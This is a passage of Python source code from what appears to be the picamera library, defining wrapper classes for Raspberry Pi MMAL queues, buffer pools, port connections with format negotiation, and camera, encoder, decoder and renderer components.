    timeout) with the :meth:`get` method.
    """
    __slots__ = ('_queue', '_created')
    def __init__(self, queue):
        # Wrap an existing MMAL queue pointer; _created tracks whether this
        # instance owns the underlying queue (and must destroy it on close)
        self._created = False
        self._queue = queue
    @classmethod
    def create(cls):
        """
        Construct a new queue owned by the returned instance; the underlying
        MMAL queue will be destroyed when :meth:`close` is called.
        """
        self = cls(mmal.mmal_queue_create())
        self._created = True
        return self
    def close(self):
        """
        Destroy the queue if it was constructed by :meth:`create`; queues
        merely wrapped by this instance are owned elsewhere and left intact.
        Safe to call more than once.
        """
        if self._created:
            # Bug fix: mmal_queue_destroy was previously referenced without
            # the mmal module prefix, raising NameError (and leaking the
            # queue) instead of freeing it
            mmal.mmal_queue_destroy(self._queue)
            # Clear the flag so a second close() cannot double-destroy
            self._created = False
        self._queue = None
    def __len__(self):
        # Number of buffers currently held in the queue
        return mmal.mmal_queue_length(self._queue)
    def get(self, block=True, timeout=None):
        """
        Get the next buffer from the queue. If *block* is ``True`` (the default)
        and *timeout* is ``None`` (the default) then the method will block
        until a buffer is available. Otherwise *timeout* is the maximum time to
        wait (in seconds) for a buffer to become available. If a buffer is not
        available before the timeout expires, the method returns ``None``.
        Likewise, if *block* is ``False`` and no buffer is immediately
        available then ``None`` is returned.
        """
        if block and timeout is None:
            buf = mmal.mmal_queue_wait(self._queue)
        elif block and timeout is not None:
            # MMAL expects the timeout in milliseconds
            buf = mmal.mmal_queue_timedwait(self._queue, int(timeout * 1000))
        else:
            buf = mmal.mmal_queue_get(self._queue)
        if buf:
            return MMALBuffer(buf)
        # Implicitly returns None when no buffer was available
    def put(self, buf):
        """
        Place :class:`MMALBuffer` *buf* at the back of the queue.
        """
        mmal.mmal_queue_put(self._queue, buf._buf)
    def put_back(self, buf):
        """
        Place :class:`MMALBuffer` *buf* at the front of the queue. This is
        used when a buffer was removed from the queue but needs to be put
        back at the front where it was originally taken from.
        """
        mmal.mmal_queue_put_back(self._queue, buf._buf)
class MMALPool(object):
    """
    Represents an MMAL pool containing :class:`MMALBuffer` objects. All active
    ports are associated with a pool of buffers, and a queue. Instances can be
    treated as a sequence of :class:`MMALBuffer` objects but this is only
    recommended for debugging purposes; otherwise, use the :meth:`get_buffer`,
    :meth:`send_buffer`, and :meth:`send_all_buffers` methods which work with
    the encapsulated :class:`MMALQueue`.
    """
    __slots__ = ('_pool', '_queue')
    def __init__(self, pool):
        # pool is a pointer to the underlying MMAL pool structure
        self._pool = pool
        super(MMALPool, self).__init__()
        # Wrap (but don't own) the queue embedded in the pool structure
        self._queue = MMALQueue(pool[0].queue)
    def __len__(self):
        # Number of buffer headers in the pool (not the number queued)
        return self._pool[0].headers_num
    def __getitem__(self, index):
        return MMALBuffer(self._pool[0].header[index])
    @property
    def queue(self):
        """
        The :class:`MMALQueue` associated with the pool.
        """
        return self._queue
    def close(self):
        # Destroy the pool; the embedded queue is freed along with it
        if self._pool is not None:
            mmal.mmal_pool_destroy(self._pool)
            self._pool = None
    def resize(self, new_count, new_size):
        """
        Resizes the pool to contain *new_count* buffers with *new_size* bytes
        allocated to each buffer.
        *new_count* must be 1 or more (you cannot resize a pool to contain
        no headers). However, *new_size* can be 0 which causes all payload
        buffers to be released.
        .. warning::
            If the pool is associated with a port, the port must be disabled
            when resizing the pool.
        """
        mmal_check(
            mmal.mmal_pool_resize(self._pool, new_count, new_size),
            prefix='unable to resize pool')
    def get_buffer(self, block=True, timeout=None):
        """
        Get the next buffer from the pool's queue. See :meth:`MMALQueue.get`
        for the meaning of the parameters.
        """
        return self._queue.get(block, timeout)
    def send_buffer(self, port, block=True, timeout=None):
        """
        Get a buffer from the pool's queue and send it to *port*. *block* and
        *timeout* act as they do in :meth:`get_buffer`. If no buffer is
        available (for the values of *block* and *timeout*,
        :exc:`~picamera.PiCameraMMALError` is raised).
        """
        buf = self.get_buffer(block, timeout)
        if buf is None:
            raise PiCameraMMALError(mmal.MMAL_EAGAIN, 'no buffers available')
        port.send_buffer(buf)
    def send_all_buffers(self, port, block=True, timeout=None):
        """
        Send all buffers from the queue to *port*. *block* and *timeout* act as
        they do in :meth:`get_buffer`. If no buffer is available (for the
        values of *block* and *timeout*, :exc:`~picamera.PiCameraMMALError` is
        raised).
        """
        # Snapshot the queue length up front; each send_buffer call below
        # pops exactly one buffer from the queue
        for i in range(len(self._queue)):
            self.send_buffer(port, block, timeout)
class MMALPortPool(MMALPool):
    """
    Construct an MMAL pool for the number and size of buffers required by
    the :class:`MMALPort` *port*.
    """
    __slots__ = ('_port',)
    def __init__(self, port):
        # Size the pool according to the port's current buffer settings
        p = port._port
        pool = mmal.mmal_port_pool_create(
            p, p[0].buffer_num, p[0].buffer_size)
        if not pool:
            raise PiCameraMMALError(
                mmal.MMAL_ENOSPC,
                'failed to create buffer header pool for port %s' % port.name)
        super(MMALPortPool, self).__init__(pool)
        self._port = port
    def close(self):
        # Port-owned pools must be destroyed with the port-specific API
        # before the generic pool teardown runs
        if self._pool is not None:
            mmal.mmal_port_pool_destroy(self._port._port, self._pool)
            self._port = None
            self._pool = None
        super(MMALPortPool, self).close()
    @property
    def port(self):
        """
        The :class:`MMALPort` this pool was constructed for.
        """
        return self._port
    def send_buffer(self, port=None, block=True, timeout=None):
        """
        Get a buffer from the pool and send it to *port* (or the port the pool
        is associated with by default). *block* and *timeout* act as they do in
        :meth:`MMALPool.get_buffer`.
        """
        super(MMALPortPool, self).send_buffer(
            self._port if port is None else port, block, timeout)
    def send_all_buffers(self, port=None, block=True, timeout=None):
        """
        Send all buffers from the pool to *port* (or the port the pool is
        associated with by default). *block* and *timeout* act as they do in
        :meth:`MMALPool.get_buffer`.
        """
        super(MMALPortPool, self).send_all_buffers(
            self._port if port is None else port, block, timeout)
class MMALBaseConnection(MMALObject):
    """
    Abstract base class for :class:`MMALConnection` and
    :class:`MMALPythonConnection`. Handles weakrefs to the source and
    target ports, and format negotiation. All other connection details are
    handled by the descendent classes.
    """
    __slots__ = ('_source', '_target')
    default_formats = ()
    # (source, target) pairs of OPAQUE sub-formats that may legally be
    # connected; any other pairing causes negotiation to skip OPAQUE
    compatible_opaque_formats = {
        ('OPQV-single', 'OPQV-single'),
        ('OPQV-dual', 'OPQV-dual'),
        ('OPQV-strips', 'OPQV-strips'),
        ('OPQV-dual', 'OPQV-single'),
        ('OPQV-single', 'OPQV-dual'), # recent firmwares permit this
        }
    def __init__(
            self, source, target, formats=default_formats):
        super(MMALBaseConnection, self).__init__()
        # Validate the port pairing: connections always run from an output
        # port to an input port, and neither may already be connected
        if not isinstance(source, (MMALPort, MMALPythonPort)):
            raise PiCameraValueError('source is not a port')
        if not isinstance(target, (MMALPort, MMALPythonPort)):
            raise PiCameraValueError('target is not a port')
        if source.type != mmal.MMAL_PORT_TYPE_OUTPUT:
            raise PiCameraValueError('source is not an output port')
        if target.type != mmal.MMAL_PORT_TYPE_INPUT:
            raise PiCameraValueError('target is not an input port')
        if source.connection is not None:
            raise PiCameraValueError('source port is already connected')
        if target.connection is not None:
            raise PiCameraValueError('target port is already connected')
        if formats is None:
            formats = ()
        self._source = source
        self._target = target
        # Permit a single format to be passed bare (not in an iterable)
        try:
            iter(formats)
        except TypeError:
            formats = (formats,)
        self._negotiate_format(formats)
        source._connection = self
        target._connection = self
        # Descendents continue with connection implementation...
    def close(self):
        # Detach both ports from this connection (idempotent)
        if self._source is not None:
            self._source._connection = None
        self._source = None
        if self._target is not None:
            self._target._connection = None
        self._target = None
    def _negotiate_format(self, formats):
        # Attempt each candidate format in preference order until the pair
        # of ports accepts one; raises PiCameraMMALError on failure
        def copy_format():
            # Commit the source format and mirror it onto the target
            self._source.commit()
            self._target.copy_from(self._source)
            self._target.commit()
        def max_buffers():
            # Harmonize buffer counts/sizes to the larger of the two ports
            self._source.buffer_count = self._target.buffer_count = max(
                self._source.buffer_count, self._target.buffer_count)
            self._source.buffer_size = self._target.buffer_size = max(
                self._source.buffer_size, self._target.buffer_size)
        # Filter out formats that aren't supported on both source and target
        # ports. This is a little tricky as ports that support OPAQUE never
        # claim they do (so we have to assume it's mutually supported)
        mutually_supported = (
            set(self._source.supported_formats) &
            set(self._target.supported_formats)
            ) | {mmal.MMAL_ENCODING_OPAQUE}
        formats = [f for f in formats if f in mutually_supported]
        if formats:
            # If there are any formats left to try, perform the negotiation
            # with the filtered list. Again, there's some special casing to
            # deal with the incompatible OPAQUE sub-formats
            for f in formats:
                if f == mmal.MMAL_ENCODING_OPAQUE:
                    if (self._source.opaque_subformat,
                            self._target.opaque_subformat) in self.compatible_opaque_formats:
                        self._source.format = mmal.MMAL_ENCODING_OPAQUE
                    else:
                        continue
                else:
                    self._source.format = f
                try:
                    copy_format()
                except PiCameraMMALError as e:
                    if e.status != mmal.MMAL_EINVAL:
                        raise
                    # EINVAL means this format was rejected; try the next
                    continue
                else:
                    max_buffers()
                    return
            raise PiCameraMMALError(
                mmal.MMAL_EINVAL, 'failed to negotiate port format')
        else:
            # If no formats are available to try (either from filtering or
            # because none were given), assume the source port is set up
            # properly. Just copy the format to the target and hope the caller
            # knows what they're doing
            try:
                copy_format()
            except PiCameraMMALError as e:
                if e.status != mmal.MMAL_EINVAL:
                    raise
                raise PiCameraMMALError(
                    mmal.MMAL_EINVAL, 'failed to copy source format to target port')
            else:
                max_buffers()
    def __enter__(self):
        return self
    def __exit__(self, exc_type, exc_value, exc_tb):
        self.close()
    @property
    def source(self):
        """
        The source :class:`MMALPort` or :class:`MMALPythonPort` of the
        connection.
        """
        return self._source
    @property
    def target(self):
        """
        The target :class:`MMALPort` or :class:`MMALPythonPort` of the
        connection.
        """
        return self._target
class MMALConnection(MMALBaseConnection):
    """
    Represents an MMAL internal connection between two components. The
    constructor accepts arguments providing the *source* :class:`MMALPort` and
    *target* :class:`MMALPort`.
    The *formats* parameter specifies an iterable of formats (in preference
    order) that the connection may attempt when negotiating formats between
    the two ports. If this is ``None``, or an empty iterable, no negotiation
    will take place and the source port's format will simply be copied to the
    target port. Otherwise, the iterable will be worked through in order until
    a format acceptable to both ports is discovered.
    .. note::
        The default *formats* list starts with OPAQUE; the class understands
        the different OPAQUE sub-formats (see :ref:`mmal` for more information)
        and will only select OPAQUE if compatible sub-formats can be used on
        both ports.
    The *callback* parameter can optionally specify a callable which will be
    executed for each buffer that traverses the connection (providing an
    opportunity to manipulate or drop that buffer). If specified, it must be a
    callable which accepts two parameters: the :class:`MMALConnection` object
    sending the data, and the :class:`MMALBuffer` object containing data. The
    callable may optionally manipulate the :class:`MMALBuffer` and return it
    to permit it to continue traversing the connection, or return ``None``
    in which case the buffer will be released.
    .. note::
        There is a significant performance penalty for specifying a
        callback between MMAL components as it requires buffers to be
        copied from the GPU's memory to the CPU's memory and back again.
    .. data:: default_formats
        :annotation: = (MMAL_ENCODING_OPAQUE, MMAL_ENCODING_I420, MMAL_ENCODING_RGB24, MMAL_ENCODING_BGR24, MMAL_ENCODING_RGBA, MMAL_ENCODING_BGRA)
        Class attribute defining the default formats used to negotiate
        connections between MMAL components.
    """
    __slots__ = ('_connection', '_callback', '_wrapper')
    default_formats = (
        mmal.MMAL_ENCODING_OPAQUE,
        mmal.MMAL_ENCODING_I420,
        mmal.MMAL_ENCODING_RGB24,
        mmal.MMAL_ENCODING_BGR24,
        mmal.MMAL_ENCODING_RGBA,
        mmal.MMAL_ENCODING_BGRA,
    )
    def __init__(
            self, source, target, formats=default_formats, callback=None):
        if not isinstance(source, MMALPort):
            raise PiCameraValueError('source is not an MMAL port')
        if not isinstance(target, MMALPort):
            raise PiCameraValueError('target is not an MMAL port')
        super(MMALConnection, self).__init__(source, target, formats)
        self._connection = ct.POINTER(mmal.MMAL_CONNECTION_T)()
        self._callback = callback
        flags = mmal.MMAL_CONNECTION_FLAG_ALLOCATION_ON_INPUT
        # Tunnelling keeps buffers on the GPU side; it can only be used when
        # no Python callback needs to see the buffer contents
        if callback is None:
            flags |= mmal.MMAL_CONNECTION_FLAG_TUNNELLING
        try:
            mmal_check(
                mmal.mmal_connection_create(
                    self._connection, source._port, target._port, flags),
                prefix="Failed to create connection")
        except:
            # Ensure close() is safe to call after a failed construction
            self._connection = None
            raise
    def close(self):
        if self._connection is not None:
            mmal.mmal_connection_destroy(self._connection)
            self._connection = None
        self._wrapper = None
        super(MMALConnection, self).close()
    @property
    def enabled(self):
        """
        Returns ``True`` if the connection is enabled. Use :meth:`enable`
        and :meth:`disable` to control the state of the connection.
        """
        return bool(self._connection[0].is_enabled)
    def enable(self):
        """
        Enable the connection. When a connection is enabled, data is
        continually transferred from the output port of the source to the input
        port of the target component.
        """
        def wrapper(connection):
            # First, drain the connection's output queue: pass each buffer
            # through the user callback and forward (or drop) the result
            buf = mmal.mmal_queue_get(connection[0].queue)
            if buf:
                buf = MMALBuffer(buf)
                try:
                    modified_buf = self._callback(self, buf)
                except:
                    buf.release()
                    raise
                else:
                    if modified_buf is not None:
                        try:
                            self._target.send_buffer(modified_buf)
                        except PiCameraPortDisabled:
                            # Target port disabled; ignore the error
                            pass
                    else:
                        # Callback returned None: drop the buffer
                        buf.release()
                    return
            # Otherwise, return a free buffer from the connection's pool to
            # the source port so it can continue producing data
            buf = mmal.mmal_queue_get(connection[0].pool[0].queue)
            if buf:
                buf = MMALBuffer(buf)
                try:
                    self._source.send_buffer(buf)
                except PiCameraPortDisabled:
                    # Source port has been disabled; ignore the error
                    pass
        if self._callback is not None:
            # Non-tunnelled connection: install the Python-side wrapper and
            # request zero-copy to minimize GPU<->CPU transfer cost
            self._wrapper = mmal.MMAL_CONNECTION_CALLBACK_T(wrapper)
            self._connection[0].callback = self._wrapper
            self._source.params[mmal.MMAL_PARAMETER_ZERO_COPY] = True
            self._target.params[mmal.MMAL_PARAMETER_ZERO_COPY] = True
        mmal_check(
            mmal.mmal_connection_enable(self._connection),
            prefix="Failed to enable connection")
        if self._callback is not None:
            # Prime the source port with all buffers from the pool
            MMALPool(self._connection[0].pool).send_all_buffers(self._source)
    def disable(self):
        """
        Disables the connection.
        """
        mmal_check(
            mmal.mmal_connection_disable(self._connection),
            prefix="Failed to disable connection")
        self._wrapper = None
    @property
    def name(self):
        return self._connection[0].name.decode('ascii')
    def __repr__(self):
        if self._connection is not None:
            return '<MMALConnection "%s">' % self.name
        else:
            return '<MMALConnection closed>'
class MMALRawCamera(MMALBaseComponent):
    """
    The MMAL "raw camera" component.
    Don't use this! If you insist on using this anyway, read the forum post
    about `raw sensor access`_ first.
    .. _raw sensor access: https://www.raspberrypi.org/forums/viewtopic.php?f=43&t=109137
    """
    __slots__ = ()
    component_type = mmal.MMAL_COMPONENT_RAW_CAMERA
    # No inputs; single output producing OPQV-single opaque buffers
    opaque_input_subformats = ()
    opaque_output_subformats = ('OPQV-single',)
class MMALCamera(MMALBaseComponent):
    """
    Represents the MMAL camera component. This component has 0 input ports and
    3 output ports. The intended use of the output ports (which in turn
    determines the behaviour of those ports) is as follows:
    * Port 0 is intended for preview renderers
    * Port 1 is intended for video recording
    * Port 2 is intended for still image capture
    Use the ``MMAL_PARAMETER_CAMERA_CONFIG`` parameter on the control port to
    obtain and manipulate the camera's configuration.
    """
    __slots__ = ()
    component_type = mmal.MMAL_COMPONENT_DEFAULT_CAMERA
    opaque_output_subformats = ('OPQV-single', 'OPQV-dual', 'OPQV-strips')
    # Annotation structure revisions, oldest first; revision N is
    # annotate_structs[N - 1]
    annotate_structs = (
        mmal.MMAL_PARAMETER_CAMERA_ANNOTATE_T,
        mmal.MMAL_PARAMETER_CAMERA_ANNOTATE_V2_T,
        mmal.MMAL_PARAMETER_CAMERA_ANNOTATE_V3_T,
    )
    def __init__(self):
        global FIX_RGB_BGR_ORDER
        super(MMALCamera, self).__init__()
        if PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE] is None:
            found = False
            # try largest struct to smallest as later firmwares still happily
            # accept earlier revision structures
            # XXX do old firmwares reject too-large structs?
            for struct in reversed(MMALCamera.annotate_structs):
                try:
                    PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE] = struct
                    self.control.params[mmal.MMAL_PARAMETER_ANNOTATE]
                except PiCameraMMALError:
                    pass
                else:
                    found = True
                    break
            if not found:
                PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE] = None
                raise PiCameraMMALError(
                    mmal.MMAL_EINVAL, "unknown camera annotation structure revision")
        if FIX_RGB_BGR_ORDER is None:
            # old firmware lists BGR24 before RGB24 in supported_formats
            for f in self.outputs[1].supported_formats:
                if f == mmal.MMAL_ENCODING_BGR24:
                    FIX_RGB_BGR_ORDER = True
                    break
                elif f == mmal.MMAL_ENCODING_RGB24:
                    FIX_RGB_BGR_ORDER = False
                    break
    def _get_annotate_rev(self):
        # NOTE: tuple.index raises ValueError (not IndexError) when the
        # value is absent; catching IndexError here would let an unknown
        # struct escape as an unhandled ValueError
        try:
            return MMALCamera.annotate_structs.index(PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE]) + 1
        except ValueError:
            raise PiCameraMMALError(
                mmal.MMAL_EINVAL, "unknown camera annotation structure revision")
    def _set_annotate_rev(self, value):
        # Reject value < 1 explicitly; otherwise e.g. value=0 would silently
        # select the *last* revision via Python's negative indexing
        try:
            if not 1 <= value <= len(MMALCamera.annotate_structs):
                raise IndexError(value)
            PARAM_TYPES[mmal.MMAL_PARAMETER_ANNOTATE] = MMALCamera.annotate_structs[value - 1]
        except IndexError:
            raise PiCameraMMALError(
                mmal.MMAL_EINVAL, "invalid camera annotation structure revision")
    annotate_rev = property(_get_annotate_rev, _set_annotate_rev, doc="""\
        The annotation capabilities of the firmware have evolved over time and
        several structures are available for querying and setting video
        annotations. By default the :class:`MMALCamera` class will pick the
        latest annotation structure supported by the current firmware but you
        can select older revisions with :attr:`annotate_rev` for other purposes
        (e.g. testing).
        """)
class MMALCameraInfo(MMALBaseComponent):
    """
    Represents the MMAL camera-info component. Query the
    ``MMAL_PARAMETER_CAMERA_INFO`` parameter on the control port to obtain
    information about the connected camera module.
    """
    __slots__ = ()
    component_type = mmal.MMAL_COMPONENT_DEFAULT_CAMERA_INFO
    # Info structure revisions, oldest first; revision N is
    # info_structs[N - 1]
    info_structs = (
        mmal.MMAL_PARAMETER_CAMERA_INFO_T,
        mmal.MMAL_PARAMETER_CAMERA_INFO_V2_T,
    )
    def __init__(self):
        super(MMALCameraInfo, self).__init__()
        if PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO] is None:
            found = False
            # try smallest structure to largest as later firmwares reject
            # older structures
            for struct in MMALCameraInfo.info_structs:
                try:
                    PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO] = struct
                    self.control.params[mmal.MMAL_PARAMETER_CAMERA_INFO]
                except PiCameraMMALError:
                    pass
                else:
                    found = True
                    break
            if not found:
                PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO] = None
                raise PiCameraMMALError(
                    mmal.MMAL_EINVAL, "unknown camera info structure revision")
    def _get_info_rev(self):
        # NOTE: tuple.index raises ValueError (not IndexError) when the
        # value is absent; catching IndexError here would let an unknown
        # struct escape as an unhandled ValueError
        try:
            return MMALCameraInfo.info_structs.index(PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO]) + 1
        except ValueError:
            raise PiCameraMMALError(
                mmal.MMAL_EINVAL, "unknown camera info structure revision")
    def _set_info_rev(self, value):
        # Reject value < 1 explicitly; otherwise e.g. value=0 would silently
        # select the *last* revision via Python's negative indexing
        try:
            if not 1 <= value <= len(MMALCameraInfo.info_structs):
                raise IndexError(value)
            PARAM_TYPES[mmal.MMAL_PARAMETER_CAMERA_INFO] = MMALCameraInfo.info_structs[value - 1]
        except IndexError:
            raise PiCameraMMALError(
                mmal.MMAL_EINVAL, "invalid camera info structure revision")
    info_rev = property(_get_info_rev, _set_info_rev, doc="""\
        The camera information capabilities of the firmware have evolved over
        time and several structures are available for querying camera
        information. When initialized, :class:`MMALCameraInfo` will attempt
        to discover which structure is in use by the extant firmware. This
        property can be used to discover the structure version and to modify
        the version in use for other purposes (e.g. testing).
        """)
class MMALComponent(MMALBaseComponent):
    """
    Represents an MMAL component that acts as a filter of some sort, with a
    single input that connects to an upstream source port. This is an abstract
    base class.
    """
    __slots__ = ()
    def __init__(self):
        super(MMALComponent, self).__init__()
        # By definition a filter has exactly one input port
        assert len(self.opaque_input_subformats) == 1
    def close(self):
        # Break the upstream connection before releasing the component
        self.disconnect()
        super(MMALComponent, self).close()
    def enable(self):
        super(MMALComponent, self).enable()
        if self.connection is not None:
            self.connection.enable()
    def disable(self):
        if self.connection is not None:
            self.connection.disable()
        super(MMALComponent, self).disable()
    def connect(self, source, **options):
        """
        Connects the input port of this component to the specified *source*
        :class:`MMALPort` or :class:`MMALPythonPort`. Alternatively, as a
        convenience (primarily intended for command line experimentation; don't
        use this in scripts), *source* can be another component in which case
        the first unconnected output port will be selected as *source*.
        Keyword arguments will be passed along to the connection constructor.
        See :class:`MMALConnection` and :class:`MMALPythonConnection` for
        further information.
        """
        if isinstance(source, (MMALPort, MMALPythonPort)):
            # BUGFIX: previously **options was dropped on this branch,
            # silently ignoring connection options when a port was given
            return self.inputs[0].connect(source, **options)
        else:
            for port in source.outputs:
                if not port.connection:
                    return self.inputs[0].connect(port, **options)
            raise PiCameraMMALError(
                mmal.MMAL_EINVAL, 'no free output ports on %r' % source)
    def disconnect(self):
        """
        Destroy the connection between this component's input port and the
        upstream component.
        """
        self.inputs[0].disconnect()
    @property
    def connection(self):
        """
        The :class:`MMALConnection` or :class:`MMALPythonConnection` object
        linking this component to the upstream component.
        """
        return self.inputs[0].connection
class MMALSplitter(MMALComponent):
    """
    Represents the MMAL splitter component. This component has 1 input port
    and 4 output ports which all generate duplicates of buffers passed to the
    input port.
    """
    __slots__ = ()
    component_type = mmal.MMAL_COMPONENT_DEFAULT_VIDEO_SPLITTER
    # One OPQV-single input; all four outputs use the same sub-format
    opaque_input_subformats = ('OPQV-single',)
    opaque_output_subformats = ('OPQV-single',) * 4
class MMALISPResizer(MMALComponent):
    """
    Represents the MMAL ISP resizer component. This component has 1 input port
    and 1 output port, and supports resizing via the VideoCore ISP, along with
    conversion of numerous formats into numerous other formats (e.g. OPAQUE to
    RGB, etc). This is more efficient than :class:`MMALResizer` but is only
    available on later firmware versions.
    """
    __slots__ = ()
    component_type = mmal.MMAL_COMPONENT_DEFAULT_ISP
    # None indicates the output port doesn't carry an opaque sub-format
    opaque_input_subformats = ('OPQV-single',)
    opaque_output_subformats = (None,)
class MMALResizer(MMALComponent):
    """
    Represents the MMAL VPU resizer component. This component has 1 input port
    and 1 output port. This supports resizing via the VPU. This is not as
    efficient as :class:`MMALISPResizer` but is available on all firmware
    versions. The output port can (and usually should) have a different frame
    size to the input port.
    """
    __slots__ = ()
    component_type = mmal.MMAL_COMPONENT_DEFAULT_RESIZER
    # The VPU resizer does not accept or produce opaque formats
    opaque_input_subformats = (None,)
    opaque_output_subformats = (None,)
class MMALEncoder(MMALComponent):
    """
    Represents a generic MMAL encoder. This is an abstract base class;
    see :class:`MMALVideoEncoder` and :class:`MMALImageEncoder` for the
    concrete implementations.
    """
    __slots__ = ()
class MMALVideoEncoder(MMALEncoder):
    """
    Represents the MMAL video encoder component. This component has 1 input
    port and 1 output port. The output port is usually configured with
    ``MMAL_ENCODING_H264`` or ``MMAL_ENCODING_MJPEG``.
    """
    __slots__ = ()
    component_type = mmal.MMAL_COMPONENT_DEFAULT_VIDEO_ENCODER
    # The video encoder takes the dual-image opaque sub-format
    opaque_input_subformats = ('OPQV-dual',)
    opaque_output_subformats = (None,)
class MMALImageEncoder(MMALEncoder):
    """
    Represents the MMAL image encoder component. This component has 1 input
    port and 1 output port. The output port is typically configured with
    ``MMAL_ENCODING_JPEG`` but can also use ``MMAL_ENCODING_PNG``,
    ``MMAL_ENCODING_GIF``, etc.
    """
    __slots__ = ()
    component_type = mmal.MMAL_COMPONENT_DEFAULT_IMAGE_ENCODER
    # The image encoder takes the strips opaque sub-format
    opaque_input_subformats = ('OPQV-strips',)
    opaque_output_subformats = (None,)
class MMALDecoder(MMALComponent):
    """
    Represents a generic MMAL decoder. This is an abstract base class;
    see :class:`MMALVideoDecoder` and :class:`MMALImageDecoder` for the
    concrete implementations.
    """
    __slots__ = ()
class MMALVideoDecoder(MMALDecoder):
    """
    Represents the MMAL video decoder component. This component has 1 input
    port and 1 output port. The input port is usually configured with
    ``MMAL_ENCODING_H264`` or ``MMAL_ENCODING_MJPEG``.
    """
    __slots__ = ()
    component_type = mmal.MMAL_COMPONENT_DEFAULT_VIDEO_DECODER
    # Encoded input in; OPQV-single opaque frames out
    opaque_input_subformats = (None,)
    opaque_output_subformats = ('OPQV-single',)
class MMALImageDecoder(MMALDecoder):
    """
    Represents the MMAL image decoder component. This component has 1 input
    port and 1 output port. The input port is usually configured with
    ``MMAL_ENCODING_JPEG``.
    """
    __slots__ = ()
    component_type = mmal.MMAL_COMPONENT_DEFAULT_IMAGE_DECODER
    # Encoded input in; OPQV-single opaque frames out
    opaque_input_subformats = (None,)
    opaque_output_subformats = ('OPQV-single',)
class MMALRenderer(MMALComponent):
    """
    Represents the MMAL renderer component. This component has 1 input port and
    0 output ports. It is used to implement the camera preview and overlays.
    """
    __slots__ = ()
    component_type = mmal.MMAL_COMPONENT_DEFAULT_VIDEO_RENDERER
    # Pure sink: consumes OPQV-single opaque frames, no outputs
    opaque_input_subformats = ('OPQV-single',)
class MMALNullSink(MMALComponent):
    """
    Represents the MMAL null-sink component. This component has 1 input port
    and 0 output ports. It is used to keep the preview port "alive" (and thus
    calculating white-balance and exposure) when the camera preview is not
    required.
    """
    __slots__ = ()
    component_type = mmal.MMAL_COMPONENT_DEFAULT_NULL_SINK
    # Pure sink: consumes OPQV-single opaque frames, no outputs
    opaque_input_subformats = ('OPQV-single',)
class MMALPythonPort(MMALObject):
    """
    Implements ports for Python-based MMAL components.
    """
    __slots__ = (
        '_buffer_count',
        '_buffer_size',
        '_connection',
        '_enabled',
        '_owner',
        '_pool',
        '_type',
        '_index',
        '_supported_formats',
        '_format',
        '_callback',
    )
    # Bytes-per-pixel of the unencoded full-frame formats this port knows;
    # used to derive a buffer size from the frame dimensions in commit()
    _FORMAT_BPP = {
        'I420': 1.5,
        'RGB3': 3,
        'RGBA': 4,
        'BGR3': 3,
        'BGRA': 4,
    }
    def __init__(self, owner, port_type, index):
        self._buffer_count = 2
        self._buffer_size = 0
        self._connection = None
        self._enabled = False
        # weakref to the owning component avoids a reference cycle
        self._owner = weakref.ref(owner)
        self._pool = None
        self._callback = None
        self._type = port_type
        self._index = index
        self._supported_formats = {
            mmal.MMAL_ENCODING_I420,
            mmal.MMAL_ENCODING_RGB24,
            mmal.MMAL_ENCODING_BGR24,
            mmal.MMAL_ENCODING_RGBA,
            mmal.MMAL_ENCODING_BGRA,
        }
        # Default format: I420 video
        self._format = ct.pointer(mmal.MMAL_ES_FORMAT_T(
            type=mmal.MMAL_ES_TYPE_VIDEO,
            encoding=mmal.MMAL_ENCODING_I420,
            es=ct.pointer(mmal.MMAL_ES_SPECIFIC_FORMAT_T())))
    def close(self):
        # Break the connection and free the pool before dropping the format
        self.disconnect()
        self.disable()
        self._format = None
    def __repr__(self):
        return '<MMALPythonPort "%s": format=MMAL_FOURCC(%r) buffers=%dx%d frames=%s@%sfps>' % (
            self.name, mmal.FOURCC_str(self.format), self.buffer_count,
            self.buffer_size, self.framesize, self.framerate)
    def _get_bitrate(self):
        return self._format[0].bitrate
    def _set_bitrate(self, value):
        self._format[0].bitrate = value
    bitrate = property(_get_bitrate, _set_bitrate, doc="""\
        Retrieves or sets the bitrate limit for the port's format.
        """)
    def _get_supported_formats(self):
        return self._supported_formats
    def _set_supported_formats(self, value):
        # Accept any iterable of formats, or a single bare format
        try:
            value = {f for f in value}
        except TypeError:
            value = {value}
        if not value:
            raise PiCameraMMALError(
                mmal.MMAL_EINVAL, "port must have at least one valid format")
        self._supported_formats = value
    supported_formats = property(_get_supported_formats, _set_supported_formats, doc="""\
        Retrieves or sets the set of valid formats for this port. The set must
        always contain at least one valid format. A single format can be
        specified; it will be converted implicitly to a singleton set.
        If the current port :attr:`format` is not a member of the new set, no
        error is raised. An error will be raised when :meth:`commit` is next
        called if :attr:`format` is still not a member of the set.
        """)
    def _get_format(self):
        return self._format[0].encoding
    def _set_format(self, value):
        self._format[0].encoding = value
    format = property(_get_format, _set_format, doc="""\
        Retrieves or sets the encoding format of the port. Setting this
        attribute implicitly sets the encoding variant to a sensible value
        (I420 in the case of OPAQUE).
        """)
    def _get_framesize(self):
        # The crop rectangle holds the "real" frame size; width/height hold
        # the block-aligned buffer dimensions
        return PiResolution(
            self._format[0].es[0].video.crop.width,
            self._format[0].es[0].video.crop.height,
        )
    def _set_framesize(self, value):
        value = to_resolution(value)
        video = self._format[0].es[0].video
        video.width = bcm_host.VCOS_ALIGN_UP(value.width, 32)
        video.height = bcm_host.VCOS_ALIGN_UP(value.height, 16)
        video.crop.width = value.width
        video.crop.height = value.height
    framesize = property(_get_framesize, _set_framesize, doc="""\
        Retrieves or sets the size of the source's video frames as a (width,
        height) tuple. This attribute implicitly handles scaling the given
        size up to the block size of the camera (32x16).
        """)
    def _get_framerate(self):
        video = self._format[0].es[0].video
        try:
            return Fraction(
                video.frame_rate.num,
                video.frame_rate.den)
        except ZeroDivisionError:
            # Unset frame-rate (denominator 0) is reported as 0 fps
            return Fraction(0, 1)
    def _set_framerate(self, value):
        value = to_fraction(value)
        video = self._format[0].es[0].video
        video.frame_rate.num = value.numerator
        video.frame_rate.den = value.denominator
    framerate = property(_get_framerate, _set_framerate, doc="""\
        Retrieves or sets the framerate of the port's video frames in fps.
        """)
    @property
    def pool(self):
        """
